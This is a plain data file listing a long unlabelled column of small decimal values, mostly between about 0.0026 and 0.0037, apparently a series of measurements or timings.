0.00267467
0.00267459
0.00267035
0.00268038
0.00268471
0.00268464
0.00268009
0.00268463
0.0026802
0.00268022
0.00267456
0.00267472
0.00267038
0.00267023
0.00267457
0.0026747
0.00267036
0.00269467
0.00269483
0.00269047
0.00269033
0.00269468
0.00269481
0.00269044
0.0027005
0.00270478
0.00270486
0.00270022
0.00270035
0.00270477
0.00270033
0.00270052
0.00270042
0.00270476
0.00270489
0.00270054
0.00270475
0.0027004
0.00269469
0.00269026
0.00269475
0.00269027
0.0026947
0.00269478
0.00269043
0.00268039
0.00268475
0.00268462
0.00268029
0.00268461
0.00268027
0.00268042
0.00267458
0.00267018
0.00267464
0.00267016
0.00267035
0.00267459
0.00267466
0.00268038
0.00268471
0.00268464
0.00268009
0.00268462
0.00268022
0.0026802
0.00267456
0.00267472
0.00267023
0.00267038
0.00267036
0.0026747
0.00267457
0.00268039
0.00268462
0.00268475
0.00268029
0.00268461
0.00268042
0.00268027
0.00267458
0.00267018
0.00267464
0.00267016
0.00267466
0.00267459
0.00267035
0.00268038
0.00268471
0.00268464
0.00268009
0.00268463
0.0026802
0.00268022
0.00267456
0.00267472
0.00267038
0.00267023
0.00267458
0.0026747
0.00267036
0.00269468
0.00269445
0.00269047
0.00269046
0.00269459
0.00269459
0.00269034
0.00268029
0.00268067
0.00268453
0.00268453
0.00268041
0.00268462
0.00268041
0.00269467
0.00269483
0.00269047
0.00269033
0.00269468
0.00269481
0.00269045
0.00270051
0.00270478
0.00270486
0.00270022
0.00270035
0.00270477
0.00270033
0.00270052
0.00270042
0.00270476
0.0027049
0.00270054
0.00270475
0.0027004
0.00269469
0.00269026
0.00269475
0.00269027
0.0026947
0.00269478
0.00269044
0.00268039
0.00268462
0.00268475
0.00268029
0.00268461
0.00268042
0.00268027
0.00267458
0.00267018
0.00267464
0.00267016
0.00267035
0.00267459
0.00267467
0.00268038
0.00268471
0.00268464
0.00268009
0.00268462
0.00268022
0.0026802
0.00267456
0.00267472
0.00267038
0.00267023
0.00267036
0.00267458
0.0026747
0.00268039
0.00268462
0.00268475
0.00268029
0.00268461
0.00268042
0.00268027
0.00267458
0.00267018
0.00267464
0.00267016
0.00267467
0.00267459
0.00267035
0.00268038
0.00268471
0.00268464
0.00268009
0.00268463
0.0026802
0.00268022
0.00267456
0.00267472
0.00267038
0.00267023
0.00267457
0.0026747
0.00267036
0.00268029
0.00268067
0.00268453
0.00268453
0.00268462
0.00268041
0.00268041
0.00265453
0.0026543
0.00265034
0.00265034
0.00265022
0.00265444
0.00265444
0.00265452
0.00265467
0.0026502
0.00265036
0.00265465
0.00265453
0.00265033
0.00266033
0.00266456
0.00266463
0.00266002
0.00266014
0.00266455
0.00266016
0.00266034
0.00266023
0.00266467
0.00266455
0.00266021
0.00266454
0.00266036
0.00265454
0.00265013
0.0026546
0.00265015
0.00265462
0.00265455
0.00265032
0.00265452
0.00265468
0.0026502
0.00265036
0.00265466
0.00265453
0.00265033
0.00266033
0.00266456
0.00266463
0.00266003
0.00266455
0.00266014
0.00266016
0.00266034
0.00266023
0.00266467
0.00266455
0.00266454
0.00266021
0.00266036
0.00265454
0.00265013
0.00265461
0.00265016
0.00265462
0.00265033
0.00265455
0.00265453
0.0026543
0.00265035
0.00265034
0.00265444
0.00265444
0.00265022
0.00266033
0.00266456
0.00266464
0.00266002
0.00266014
0.00266455
0.00266016
0.00266034
0.00266023
0.00266467
0.00266455
0.00266021
0.00266454
0.00266036
0.0026546
0.00265016
0.00265455
0.00266033
0.00266456
0.00266464
0.00266003
0.00266455
0.00266014
0.00266016
0.00266034
0.00266023
0.00266455
0.00266467
0.00266454
0.00266036
0.00266021
0.00265452
0.00265468
0.00265036
0.0026502
0.00265453
0.00265466
0.00265033
0.00266033
0.00266456
0.00266464
0.00266002
0.00266016
0.00266455
0.00266014
0.00266034
0.00266023
0.00266455
0.00266467
0.00266036
0.00266454
0.00266021
0.00265454
0.00265013
0.0026546
0.00265016
0.00265455
0.00265462
0.00265033
0.00265452
0.00265468
0.00265036
0.0026502
0.00265453
0.00265466
0.00265033
0.00266033
0.00266456
0.00266464
0.00266002
0.00266016
0.00266455
0.00266014
0.00266034
0.00266023
0.00266455
0.00266467
0.00266036
0.00266454
0.00266021
0.00265454
0.00265013
0.0026546
0.00265015
0.00265455
0.00265462
0.00265033
0.0036268
0.00363214
0.00362618
0.00362731
0.00363257
0.00363472
0.00363399
0.00364274
0.00364311
0.00364439
0.00364504
0.00364528
0.00364819
0.00364686
0.00362683
0.00362622
0.00363221
0.00362736
0.00363269
0.00363484
0.00363407
0.00364283
0.00364318
0.00364446
0.00364513
0.00364538
0.00364826
0.00364695
0.00364287
0.00364322
0.00364454
0.00364517
0.00364543
0.00364828
0.00364698
0.00364273
0.00364311
0.00364442
0.00364502
0.00364532
0.00364817
0.00364688
0.00362679
0.00363214
0.00362616
0.00362729
0.00363256
0.0036347
0.00363399
0.00364293
0.00364327
0.00364459
0.00364523
0.00364551
0.00364841
0.00364705
0.00362681
0.00363218
0.00362617
0.0036273
0.00363259
0.00363473
0.00363403
0.00362676
0.00362615
0.00363209
0.00362728
0.00363254
0.00363469
0.00363395
0.00362674
0.00363207
0.00362609
0.00362723
0.00363246
0.00363462
0.00363393
0.00364281
0.00364319
0.00364448
0.00364514
0.00364537
0.00364829
0.00364696
0.00362682
0.00362618
0.00363215
0.00362732
0.00363257
0.00363473
0.00363401
0.00362682
0.0036262
0.00363216
0.00362733
0.00363259
0.00363476
0.00363402
0.00364289
0.00364317
0.00364451
0.00364516
0.00364558
0.00364842
0.00364696
0.00364293
0.00364327
0.00364459
0.00364523
0.0036455
0.00364835
0.00364703
0.00362196
0.00362677
0.00362565
0.00361946
0.00362809
0.00362005
0.00362126
0.00362195
0.00362675
0.00362566
0.00361946
0.00362808
0.00362005
0.00362126
0.00365536
0.00365191
0.00365503
0.00366218
0.00365172
0.00365543
0.00365192
0.00365496
0.00366226
0.00365171
0.00365371
0.00365069
0.00365776
0.00365236
0.00366126
0.00365936
0.00365135
0.00363039
0.00362463
0.003621
0.0036235
0.00362436
0.00362606
0.00362876
0.00363573
0.00363456
0.00363942
0.0036277
0.00364223
0.00362896
0.00363371
0.00365346
0.00364944
0.00365769
0.00365229
0.00366183
0.00365917
0.00365117
0.00363046
0.0036247
0.00362104
0.00362354
0.00362441
0.00362613
0.00362882
0.0036358
0.00363457
0.00363943
0.00362773
0.00364226
0.00362899
0.00363376
0.00365547
0.00365263
0.00365574
0.00366265
0.00365201
0.00365545
0.00365195
0.00365519
0.00366225
0.0036518
0.00365401
0.00364885
0.00365885
0.003653
0.00366205
0.00365928
0.00365233
0.00363044
0.00362468
0.00362352
0.00362102
0.00362439
0.0036288
0.00362611
0.00363576
0.00363452
0.00363934
0.00362772
0.00364217
0.00362896
0.00363375
0.00365334
0.00364869
0.00365759
0.00365208
0.00366141
0.0036593
0.0036509
0.00363037
0.00362461
0.00362347
0.00362098
0.00362434
0.00362872
0.00362604
0.00363572
0.00363452
0.00363935
0.00362768
0.0036422
0.00362893
0.00363368
0.00362326
0.00361306
0.00362007
0.00361379
0.00362621
0.00360626
0.0035883
0.00361779
0.00362304
0.00361329
0.00361993
0.00361343
0.00362627
0.00360616
0.00358676
0.0036175
0.00362183
0.00361699
0.00361049
0.00361043
0.00361746
0.00361735
0.00360596
0.00365248
0.00364478
0.00364485
0.00365174
0.00364649
0.00365293
0.00364599
0.00364472
0.00365183
0.00364634
0.00363381
0.003626
0.00363837
0.00363837
0.00364804
0.00363033
0.00363028
0.00361531
0.00360773
0.00359634
0.00361593
0.00359705
0.00361536
0.00360773
0.00359616
0.00361586
0.00359703
0.00361592
0.00361868
0.0036112
0.00361191
0.00361914
0.00361358
0.00361459
0.00362303
0.0036228
0.00363304
0.00362366
0.00362818
0.00362631
0.00361995
0.0036186
0.00361309
0.00361091
0.00360459
0.00362254
0.00361872
0.0036149
0.00361587
0.00361858
0.00361127
0.00361189
0.00361919
0.00361351
0.00361452
0.00362295
0.00362281
0.00363304
0.00362361
0.00362807
0.00362633
0.00361991
0.0036185
0.00361287
0.00361084
0.00360452
0.00362269
0.00361894
0.00361447
0.00362196
0.00362677
0.00362565
0.00361946
0.00362808
0.00362005
0.00362126
0.0036219
0.00362669
0.00362558
0.00361942
0.00362801
0.00362
0.00362122
0.00361976
0.00360326
0.00361321
0.00360722
0.00362315
0.0036094
0.00362316
0.00362266
0.00362985
0.00362024
0.00362839
0.00362433
0.00361936
0.0036214
0.0036047
0.00361227
0.00361565
0.00360696
0.00361326
0.00362089
0.00361712
0.00361337
0.0036155
0.00361473
0.00362565
0.00362794
0.00363115
0.00362184
0.00363335
0.00362582
0.00362361
0.00362074
0.00361982
0.0036144
0.00362191
0.00362077
0.00361446
0.00361807
0.00362809
0.00363553
0.00363623
0.00363173
0.00361377
0.00360041
0.00360168
0.00360785
0.00362226
0.00361406
0.00361423
0.00361492
0.00362282
0.00361338
0.00361514
0.00362004
0.00360325
0.00361334
0.00360746
0.00362416
0.00360941
0.0036231
0.00362263
0.00362987
0.00362015
0.00362837
0.00362436
0.00361928
0.00362144
0.00360469
0.00361227
0.00361566
0.0036209
0.00360696
0.00361327
0.00361749
0.00361393
0.00361623
0.00361514
0.00362542
0.00362778
0.00363103
0.00362175
0.00363318
0.00362587
0.00362346
0.00361974
0.00361866
0.00361835
0.00361398
0.00361328
0.00361566
0.00362028
0.0036285
0.00363649
0.00363558
0.00363251
0.00362195
0.00361379
0.00361402
0.00361491
0.00362254
0.00361326
0.0036147
0.00361348
0.00360027
0.00360793
0.00360131
0.0036553
0.00365186
0.00365541
0.00366227
0.00365173
0.00365504
0.0036516
0.00365463
0.00366223
0.00365178
0.00365414
0.0036488
0.0036574
0.00365314
0.0036615
0.00365944
0.00365195
0.0036304
0.00362464
0.003621
0.0036235
0.00362606
0.00362437
0.00362876
0.00363575
0.00363455
0.00363937
0.00362771
0.00364223
0.00362896
0.00363372
0.00365362
0.00365072
0.0036579
0.0036521
0.00366137
0.00365919
0.00365128
0.00363044
0.00362468
0.00362103
0.00362352
0.00362611
0.00362439
0.0036288
0.00363577
0.00363455
0.0036394
0.00362773
0.00364222
0.00362898
0.00363376
0.00362299
0.00361993
0.00361301
0.00360621
0.00361385
0.00362619
0.00358832
0.00361771
0.0036218
0.00361698
0.00361042
0.00361044
0.00361743
0.00361742
0.00360589
0.00365227
0.00364577
0.00364484
0.00365128
0.00364632
0.00365322
0.00364244
0.00364423
0.00365303
0.00364587
0.00363372
0.00362599
0.00363833
0.00363832
0.00364794
0.00363028
0.00363019
0.00361518
0.00360771
0.0035963
0.00361592
0.00359707
0.00361512
0.00360765
0.00359665
0.00361581
0.00359701
0.00361588
0.00361853
0.00361193
0.00361119
0.00361454
0.00361907
0.00361357
0.00362299
0.00362278
0.00363304
0.00362364
0.00362815
0.00362629
0.00361993
0.00361855
0.00361312
0.00361085
0.00360459
0.00362246
0.00361869
0.00361488
0.00361547
0.00361477
0.00361286
0.00361002
0.00361688
0.00361278
0.00361261
0.00362299
0.00362278
0.0036331
0.00362365
0.00362819
0.0036263
0.00361993
0.0036186
0.00361301
0.00361106
0.00360447
0.00361882
0.0036148
0.00362269
0.00362336
0.00361306
0.00362009
0.00362638
0.00361378
0.00360633
0.00358788
0.00361785
0.00362192
0.00362674
0.00362566
0.00361943
0.00362807
0.00362002
0.00362123
0.0036219
0.0036267
0.00362557
0.00361942
0.00362801
0.00362
0.00362122
0.00361821
0.00361569
0.00360342
0.00361679
0.00360686
0.00360977
0.00362298
0.00362263
0.00363028
0.00361967
0.00362866
0.00362424
0.00361918
0.00362085
0.0036046
0.00361214
0.00361563
0.00360662
0.00361309
0.00362072
0.00361675
0.00361465
0.00361447
0.00361511
0.00362542
0.0036278
0.00363121
0.0036217
0.00363322
0.00362593
0.00362345
0.00361965
0.00361864
0.00361392
0.00361835
0.00362023
0.00361323
0.00361562
0.00362857
0.00363646
0.00363623
0.0036323
0.00361319
0.00360015
0.00360126
0.00360779
0.00362179
0.00361404
0.00361387
0.00361489
0.00362235
0.00361329
0.0036146
0.00361995
0.00360326
0.00361322
0.00360732
0.00362379
0.00360943
0.00362305
0.00362261
0.00362985
0.00362015
0.00362838
0.00362418
0.00361929
0.00362136
0.00360468
0.0036122
0.00361565
0.00362083
0.00360689
0.00361326
0.00361685
0.00361349
0.00361556
0.00361458
0.00362536
0.00362778
0.00363115
0.00362172
0.00363322
0.00362555
0.00362346
0.00361969
0.0036187
0.00361841
0.00361396
0.00361324
0.00361568
0.0036203
0.00362862
0.00363655
0.00363572
0.00363169
0.0036217
0.00361386
0.00361411
0.00361498
0.00362254
0.00361324
0.0036147
0.0036134
0.00360013
0.00360767
0.00360134
0.00362188
0.00362665
0.00362557
0.00361937
0.00362798
0.00361998
0.00362118
0.00361982
0.00361316
0.00360323
0.00362319
0.00360725
0.00360936
0.00362313
0.00362264
0.00362983
0.0036202
0.00362836
0.00361932
0.00362435
0.0036214
0.00360469
0.0036122
0.00361568
0.00360695
0.00361329
0.00362086
0.00361749
0.00361369
0.00361605
0.00361501
0.00362563
0.00362792
0.00363108
0.0036218
0.00363329
0.00362358
0.00362597
0.00362076
0.00361986
0.00361442
0.00362192
0.0036208
0.00361808
0.00361447
0.0036138
0.00360037
0.00360168
0.0036079
0.00362836
0.00363551
0.00363591
0.00363221
0.00362234
0.00361386
0.00361413
0.00361494
0.00361513
0.0036226
0.00361335
0.00361984
0.00360349
0.00361368
0.00360715
0.00362524
0.00360978
0.00362301
0.00362258
0.0036295
0.00361999
0.0036282
0.00361921
0.00362428
0.00362133
0.00360476
0.00361216
0.00361571
0.00362084
0.00360681
0.00361337
0.00362188
0.00361745
0.00362678
0.00361592
0.00362598
0.00362774
0.0036304
0.00362136
0.00363309
0.00362338
0.00362556
0.00362072
0.00361979
0.00362185
0.00361442
0.00361797
0.00361432
0.00362088
0.00362974
0.00363655
0.00363501
0.00363395
0.00362332
0.00361403
0.00361423
0.00361527
0.00361545
0.00362367
0.00361367
0.00361377
0.00360068
0.00360788
0.00360202
0.0036553
0.00365147
0.00365495
0.00366226
0.00365156
0.00365505
0.00365126
0.00365465
0.0036622
0.0036517
0.00365346
0.00365074
0.00365719
0.00365182
0.00366128
0.00365913
0.00365082
0.0036304
0.00362464
0.003621
0.00362349
0.00362607
0.00362436
0.00362877
0.00363573
0.00363451
0.00363938
0.00362769
0.00364218
0.00362894
0.00363372
0.00365341
0.00364981
0.00365737
0.00365219
0.00366139
0.00365908
0.00365125
0.0036304
0.00362465
0.00362101
0.0036235
0.00362608
0.00362436
0.00362877
0.00363573
0.00363452
0.00363936
0.00362769
0.00364219
0.00362894
0.00363371
0.00362305
0.00362006
0.00361328
0.00360619
0.00361351
0.00362619
0.00358788
0.0036178
0.00362195
0.00361685
0.00361041
0.00361043
0.0036174
0.00361743
0.0036061
0.00365189
0.00364429
0.00364446
0.00365121
0.00364614
0.0036531
0.00364276
0.00364421
0.00365293
0.00364593
0.00363375
0.00362593
0.0036383
0.0036383
0.00364793
0.00363026
0.00363021
0.00361547
0.00360784
0.00359638
0.00361602
0.00359732
0.0036155
0.00360784
0.00359664
0.00361598
0.00359732
0.00361594
0.00361858
0.00361194
0.00361125
0.00361457
0.00361913
0.00361358
0.00362298
0.00362274
0.00363303
0.00362362
0.00362815
0.0036263
0.0036199
0.00361864
0.00361298
0.00361101
0.00360461
0.00362261
0.00361891
0.00361485
0.00361547
0.00361472
0.00361281
0.00361
0.00361689
0.00361277
0.0036126
0.00362297
0.00362275
0.00363304
0.00362362
0.00362815
0.00362627
0.00361991
0.00361859
0.00361307
0.00361095
0.00360446
0.00361891
0.00361484
0.00362258
0.00362305
0.00361306
0.00361998
0.00362626
0.00361355
0.0036062
0.00358796
0.00361774
0.00362197
0.00362678
0.00362567
0.00361947
0.0036281
0.00362006
0.00362128
0.00362027
0.00361347
0.00360357
0.0036244
0.0036076
0.00360959
0.0036232
0.00362265
0.00362988
0.00362016
0.00362839
0.00361933
0.0036244
0.00362155
0.00360487
0.0036124
0.00361579
0.00360711
0.0036134
0.00362099
0.00361668
0.0036138
0.00361622
0.00361479
0.00362529
0.00362782
0.00363115
0.00362169
0.00363316
0.00362346
0.00362578
0.00361969
0.00361867
0.00361397
0.0036184
0.00362025
0.00361568
0.00361327
0.0036132
0.00360025
0.0036012
0.00360782
0.00362756
0.00363504
0.00363522
0.00363013
0.00362189
0.00361413
0.00361414
0.00361499
0.00361474
0.00362292
0.00361333
0.00362038
0.00361347
0.0036034
0.0036245
0.00360759
0.00360955
0.00362311
0.00362267
0.00362986
0.00362023
0.00362841
0.00361934
0.00362432
0.00362153
0.00360484
0.00361236
0.00361579
0.00362098
0.00360713
0.00361336
0.00361725
0.00361364
0.00361606
0.00361487
0.00362557
0.00362791
0.00363113
0.00362179
0.00363332
0.00362359
0.00362567
0.00362078
0.0036199
0.00362205
0.00361443
0.00361816
0.00361452
0.0036208
0.00362859
0.0036352
0.00363554
0.00363143
0.00362223
0.0036139
0.00361416
0.00361491
0.00361512
0.00362269
0.00361332
0.00361382
0.0036004
0.00360792
0.00360171
0.00362203
0.00361688
0.00361041
0.00361042
0.00361746
0.00361752
0.00360614
0.00365241
0.00364495
0.00364475
0.00365153
0.00364643
0.00365243
0.00364533
0.00364462
0.00365174
0.0036466
0.00363387
0.00362599
0.00363841
0.00363841
0.0036481
0.00363034
0.00363036
0.00361565
0.00360793
0.00359649
0.00361614
0.00359735
0.00361557
0.00360796
0.00359651
0.00361619
0.00359747
0.00362295
0.00362277
0.00363313
0.00362363
0.00362815
0.00362636
0.00361988
0.0036192
0.00361351
0.00361116
0.00360462
0.00361932
0.00361545
0.00362314
0.00361543
0.0036147
0.00360986
0.00361269
0.00361696
0.00361271
0.00361204
0.003623
0.00362278
0.00363311
0.00362367
0.00362822
0.00362634
0.00361991
0.00361946
0.00361369
0.00361121
0.00360467
0.00361928
0.00361593
0.00362297
0.00362324
0.00362005
0.00361318
0.00360631
0.00362639
0.00361337
0.00358777
0.0036181
0.00362329
0.0036201
0.00361301
0.00360621
0.00362629
0.00361368
0.00358792
0.00361802
0.00363342
0.0036267
0.00363558
0.00362896
0.0036398
0.00364063
0.00364606
0.00363728
0.00363663
0.00364426
0.00364176
0.00363996
0.0036424
0.00364002
0.00363734
0.00363968
0.00364368
0.00363346
0.00363526
0.00363184
0.0036351
0.00362716
0.00363392
0.00363591
0.00362961
0.00363548
0.00362627
0.00363054
0.00363635
0.00363502
0.00362934
0.003626
0.00363319
0.00362699
0.00363543
0.00362895
0.00363954
0.0036404
0.00364505
0.00363722
0.00363639
0.00364402
0.00364083
0.00363974
0.0036422
0.0036399
0.00363701
0.00363945
0.0036435
0.00363322
0.00363513
0.00363194
0.00363401
0.00362723
0.00363374
0.00363625
0.00362965
0.00363524
0.00362607
0.00363029
0.00363599
0.0036347
0.00362912
0.00362579
0.00363319
0.00362682
0.00363526
0.00362881
0.00363967
0.00364049
0.00364588
0.00363717
0.00363649
0.00364415
0.00364165
0.00363982
0.0036422
0.0036399
0.00363708
0.00363949
0.00364351
0.00363334
0.00363526
0.0036259
0.00363034
0.00363601
0.00363473
0.00362917
0.00362574
0.0036351
0.00363176
0.00363494
0.00362704
0.00363376
0.00363579
0.0036295
0.00363348
0.00362677
0.0036355
0.00362911
0.00363982
0.00364067
0.00364601
0.00363763
0.00363671
0.00364437
0.00364171
0.00363997
0.00364243
0.00363998
0.00363723
0.00363969
0.0036437
0.00363341
0.00363531
0.00363196
0.00363518
0.00362725
0.00363399
0.00363621
0.00362973
0.0036356
0.00362633
0.00363071
0.00363642
0.00363509
0.00362954
0.00362607
0.00363314
0.00362672
0.00363522
0.0036288
0.0036397
0.00364059
0.00364608
0.00363759
0.00363663
0.00364428
0.00364165
0.00363984
0.00364226
0.00364005
0.00363709
0.00363952
0.00364365
0.00363337
0.00363525
0.00362599
0.0036304
0.003636
0.00363476
0.00362915
0.00362575
0.00363509
0.00363178
0.00363524
0.00362711
0.00363386
0.00363579
0.00362949
0.00363318
0.00362661
0.00363533
0.00362882
0.00363969
0.0036406
0.00364619
0.00363743
0.00363656
0.00364433
0.00364178
0.00363987
0.0036423
0.00364011
0.0036371
0.00363954
0.00364367
0.00363335
0.00363506
0.00363174
0.00363503
0.00362712
0.00363383
0.00363578
0.00362951
0.00363529
0.00362607
0.00363037
0.00363605
0.00363478
0.00362915
0.0036258
0.00363333
0.00362685
0.00363542
0.00362899
0.00363971
0.00364054
0.00364556
0.00363742
0.00363653
0.00364428
0.00364119
0.00363979
0.00364223
0.00363983
0.00363701
0.00363947
0.0036436
0.00363321
0.00363538
0.00362609
0.00363035
0.00363614
0.00363482
0.00362924
0.00362589
0.00363518
0.00363197
0.00363476
0.00362719
0.00363383
0.00363623
0.00362962
0.00363344
0.00362655
0.00363571
0.00362891
0.00363988
0.00364073
0.00364623
0.00363743
0.00363672
0.00364439
0.00364189
0.00363998
0.00364244
0.00364003
0.00363726
0.0036397
0.00364374
0.00363343
0.00363557
0.00362631
0.00363069
0.00363636
0.00363508
0.00362955
0.00362602
0.00363529
0.0036318
0.00363522
0.00362722
0.00363399
0.00363594
0.00362962
0.00362661
0.00363011
0.0036356
0.00362818
0.00363366
0.00363648
0.00364298
0.00364163
0.00364137
0.00364513
0.00364653
0.00364092
0.00364299
0.00365296
0.00364694
0.00364859
0.00365308
0.00362665
0.00363021
0.00363582
0.00362825
0.00363384
0.00363666
0.00364337
0.00364205
0.00364168
0.00364585
0.00364699
0.00364121
0.00364231
0.00365016
0.00364711
0.00364589
0.00365456
0.00364851
0.00365354
0.00364461
0.00365384
0.00362657
0.00363004
0.00363562
0.00362814
0.00363365
0.00363643
0.00364272
0.00364286
0.00364183
0.00364564
0.00364933
0.00364432
0.00364222
0.00364971
0.00365434
0.0036452
0.00365471
0.00362657
0.00363002
0.00363566
0.00362814
0.00363368
0.00363644
0.0036426
0.00364284
0.00364184
0.00364664
0.00365077
0.00364426
0.00364216
0.0036497
0.00365463
0.00362658
0.00363011
0.00363559
0.00362816
0.00363364
0.00363646
0.00364302
0.00364164
0.00364124
0.00364507
0.00364629
0.0036409
0.00364244
0.00365071
0.00364623
0.00362649
0.00363001
0.00363546
0.00362808
0.00363351
0.00363635
0.00364278
0.00364084
0.00364068
0.00364471
0.0036457
0.00364022
0.00364032
0.00364627
0.00364466
0.00364783
0.00365428
0.0036266
0.00363014
0.00363561
0.0036282
0.00363367
0.0036365
0.00364301
0.00364116
0.0036408
0.00364478
0.00364611
0.00364066
0.00364078
0.00364781
0.00364618
0.00362662
0.00363013
0.00363558
0.0036282
0.00363368
0.00363652
0.00364294
0.00364148
0.00364127
0.00364613
0.00364709
0.00364031
0.00364081
0.00364799
0.00364496
0.003646
0.00365535
0.00364872
0.00365361
0.00366373
0.0036494
0.00365107
0.00364874
0.00365452
0.00365334
0.00365461
0.00367546
0.00366598
0.00366664
0.00365607
0.00367454
0.00366391
0.00366457
0.00366375
0.00364939
0.0036511
0.00364875
0.00365452
0.00365341
0.00365459
0.00367547
0.00366599
0.00366669
0.00365609
0.00367457
0.00366393
0.00366455
0.0036493
0.00364925
0.00364987
0.00364659
0.0036464
0.00365312
0.00364907
0.00364956
0.00364859
0.00365042
0.00364695
0.00364679
0.00365367
0.00364932
0.00366376
0.00364954
0.00365096
0.00364872
0.00365446
0.00365341
0.0036547
0.00367539
0.0036659
0.00366658
0.00365597
0.0036745
0.00366383
0.00366444
0.00366377
0.00364944
0.00365106
0.00364871
0.0036545
0.00365335
0.00365458
0.00367544
0.00366592
0.00366664
0.00365603
0.00367452
0.00366387
0.00366449
0.00364993
0.00364806
0.00365033
0.00364715
0.00364682
0.00365364
0.00364938
0.00364927
0.00364888
0.00364978
0.00364648
0.00364631
0.00365341
0.00364887
0.00362967
0.00363912
0.00362904
0.00363313
0.00363355
0.00363375
0.00363784
0.00363032
0.00363949
0.00363262
0.00363295
0.0036351
0.00363994
0.00363398
0.00363127
0.00363842
0.00363192
0.00363383
0.00363237
0.00363096
0.00363299
0.00363313
0.00363334
0.00363137
0.00363147
0.00363048
0.00362172
0.00362072
0.00362363
0.00362326
0.00362797
0.00362638
0.00363138
0.00363194
0.00362538
0.00362648
0.0036298
0.00362786
0.00363321
0.00362098
0.00362038
0.00362315
0.00362579
0.00362742
0.00364118
0.00363474
0.00362935
0.00364178
0.00362948
0.0036304
0.0036296
0.00363815
0.00362873
0.00363242
0.00363352
0.00363399
0.00363792
0.00363029
0.00363962
0.00363256
0.00363293
0.00363475
0.00364032
0.00363382
0.00363091
0.00363837
0.00363184
0.00363299
0.00363218
0.00363089
0.00363298
0.00363304
0.00363334
0.00363129
0.00363126
0.00363037
0.00362167
0.00362045
0.00362341
0.00362291
0.00362782
0.00362619
0.00363062
0.00362855
0.00362608
0.00362523
0.00362868
0.00362562
0.0036331
0.00361981
0.00361799
0.0036222
0.0036195
0.00363287
0.00364137
0.00363451
0.00362977
0.00363932
0.00363167
0.00363166
0.0036637
0.00364933
0.00365099
0.00364869
0.00365449
0.00365335
0.00365456
0.00367553
0.00366598
0.00366671
0.00365609
0.00367459
0.00366392
0.00366463
0.00366365
0.00364937
0.00365105
0.00364871
0.00365446
0.00365332
0.00365455
0.00367546
0.00366595
0.00366666
0.00365603
0.00367456
0.0036639
0.00366448
0.00364983
0.00364805
0.00365019
0.003647
0.00364673
0.00365351
0.00364925
0.00364962
0.00364892
0.00365031
0.00364683
0.0036467
0.00365365
0.00364916
0.00363095
0.00363857
0.00362862
0.00363335
0.00363656
0.00364092
0.00363513
0.00363275
0.00363984
0.00363487
0.00363548
0.00363436
0.00363458
0.00363843
0.0036309
0.00364026
0.00363309
0.00363379
0.00363352
0.00363158
0.003634
0.00363361
0.00363435
0.00363295
0.00363197
0.00363731
0.00365181
0.00362584
0.00363248
0.00363405
0.00363522
0.00363561
0.00363118
0.00362178
0.00362066
0.00362364
0.00362319
0.00362827
0.00362677
0.00362096
0.00361837
0.00362299
0.00362162
0.00363225
0.00364239
0.00363457
0.0036302
0.00364005
0.0036318
0.00363173
0.00362949
0.00363897
0.00362878
0.00363222
0.00363369
0.0036341
0.00363807
0.00363049
0.00363978
0.0036327
0.00363319
0.00363502
0.0036398
0.00363397
0.0036315
0.00363837
0.00363197
0.00363417
0.00363236
0.00363096
0.00363306
0.00363315
0.00363339
0.00363143
0.00363145
0.0036303
0.00362169
0.00362056
0.00362337
0.00362302
0.00362787
0.00362615
0.00363052
0.00363047
0.00362492
0.00362582
0.00362929
0.00362703
0.00363345
0.00361901
0.00362096
0.00362286
0.00362211
0.00362807
0.00364154
0.00363504
0.00362963
0.00364158
0.00363022
0.00363024
0.00362964
0.00363841
0.003629
0.00363282
0.00363492
0.00364017
0.00363386
0.00363106
0.00363831
0.00363186
0.00363297
0.00363348
0.00363387
0.00363781
0.00363022
0.00363945
0.00363254
0.00363275
0.00363227
0.0036309
0.00363305
0.00363293
0.00363329
0.00363135
0.0036313
0.00363123
0.00363064
0.00362684
0.00362626
0.0036295
0.00362718
0.00363333
0.00363045
0.00362171
0.00362073
0.00362348
0.00362314
0.00362786
0.00362629
0.003621
0.00361833
0.00362261
0.00362224
0.00363215
0.00364115
0.00363436
0.00362969
0.00363967
0.00363102
0.00363169
0.00362933
0.00363642
0.00362804
0.00363173
0.00363319
0.00363362
0.00363758
0.00362998
0.00363921
0.00363229
0.00363244
0.00363469
0.00364017
0.00363326
0.00363129
0.0036377
0.00363161
0.00363564
0.00363218
0.00363066
0.00363267
0.00363274
0.00363296
0.00363107
0.0036312
0.00363024
0.00362139
0.0036204
0.0036233
0.00362268
0.00362767
0.00362616
0.00363077
0.00362973
0.00361907
0.00362325
0.00362738
0.00362631
0.00363051
0.00362139
0.00361128
0.00362425
0.0035853
0.00364026
0.00364076
0.00363278
0.00363176
0.00363962
0.00364376
0.00363415
0.00366364
0.00364931
0.00365098
0.00364863
0.00365443
0.00365324
0.00365447
0.00367536
0.00366587
0.00366656
0.00365597
0.00367443
0.00366381
0.00366442
0.00366359
0.00364931
0.003651
0.00364867
0.0036544
0.00365328
0.00365449
0.00367539
0.00366591
0.00366663
0.003656
0.00367451
0.00366385
0.00366447
0.00364942
0.00364912
0.00365026
0.00364675
0.00364664
0.00365341
0.00364918
0.00364953
0.00364849
0.00365025
0.00364682
0.00364665
0.00365347
0.00364918
0.003629
0.00363842
0.0036291
0.00363233
0.00363466
0.00363952
0.00363363
0.00363127
0.00363792
0.00363169
0.00363432
0.0036333
0.00363376
0.00363774
0.00363019
0.00363933
0.00363244
0.00363276
0.0036322
0.00363087
0.00363292
0.00363287
0.00363315
0.00363127
0.00363126
0.00363016
0.00362998
0.00362429
0.00362544
0.00362907
0.00362638
0.00363298
0.00363017
0.00362168
0.0036205
0.00362339
0.00362315
0.00362775
0.00362607
0.00362268
0.00362408
0.00362465
0.00362805
0.00362643
0.00364008
0.00363431
0.00362914
0.00363962
0.00363097
0.00363034
0.00362953
0.00363987
0.00362879
0.0036328
0.00363453
0.00363956
0.00363375
0.00363079
0.00363825
0.00363172
0.00363351
0.00363336
0.00363392
0.00363786
0.00363032
0.00363943
0.00363255
0.0036328
0.00363204
0.00363088
0.00363298
0.00363293
0.00363318
0.00363118
0.00363128
0.00363013
0.00362836
0.00362508
0.00362488
0.00362879
0.00362535
0.0036329
0.00363021
0.00362172
0.00362068
0.00362338
0.00362307
0.00362779
0.00362606
0.00361977
0.00361943
0.00362218
0.00362275
0.00362605
0.00364126
0.00363449
0.00362897
0.00364174
0.00362867
0.00362995
0.00364454
0.00364846
0.0036443
0.00364646
0.00365596
0.0036473
0.00365343
0.00364086
0.00364458
0.00364163
0.0036436
0.00364526
0.00364215
0.00364613
0.00364912
0.00364673
0.00365386
0.0036588
0.00364621
